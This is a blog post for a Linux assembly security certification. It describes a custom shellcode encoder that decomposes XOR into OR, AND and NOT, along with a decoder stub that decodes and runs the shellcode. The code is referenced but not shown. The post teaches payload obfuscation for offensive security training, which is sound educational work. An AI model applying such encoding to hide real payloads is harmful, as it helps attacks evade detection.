SLAE Assignment 4: Custom scheme encryted shellcode

Hiding in bits ...

Hint: Its easier to read code on github ! 

Hello !

Today we need to create a custom encoder for our beloved shellcodes. Again, the scheme must be original. Spoiler : I had hard time deciding on a scheme and went for a dead simple one.

The main thing I knew is that encryption on assembly level relies on XOR (because it distributes results evenly when XORing 2 bits, ie the encryption is not biased toward some results). I asked around for simple ideas for a new scheme and received a simple answer : Why not decomposing XOR ... ? Since I dont have better idea for now, let's do this !

Designing the scheme

I know you are dying to read the masterplan (/sarcasm):
- Create an encoding tool which can encode any shellcode using our scheme  ;
- Create an encoding scheme using a decomposition of XOR ;
- Pick an arbitrary static one-byte key ;
- Create a decoder stub which can decode the encoded shellcode and execute it (which is the real shellcode used here).

Coding the encoder / decoder stub

We need to create an encoder stub which eats up our shellcode and spit an encoded shellcode. I decided to code the encoder in assembly because ...  this is an assembly course and I want to get better in assembly. Drawback of this is that you need to put the shell code inside the .nasm assembly file first. Anyway, this can be scripted pretty fast if you need to. 


Now what is XOR exactly doing ?

Basically XOR is doing this :
source: https://en.wikipedia.org/wiki/Exclusive_or

A XOR B = ( A OR B ) AND NOT ( A AND B)

Done.  It relies on NOT, AND and OR.

So lets reproduce this scheme in assembly and try not to fail with parenthesis priority :).



Now we have the encoded shellcode outputed to stdout, you can redirect it to a file or pipe it to hexdump if you want to get the bytecode.

Lets code a decoder stub and run the decoded assembly.


Lets try it.

Everything works fine, puuuuurfect !! We now have a XOR encryption encoder and decoder stub in assembly. Of course it's quite simplistic because it encode only one byte at a time with a static one byte key. But this simplicity enables you to avoid padding issue and we will see a more complex encoder on Assignment 7.


 
This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/

SLAE - xxx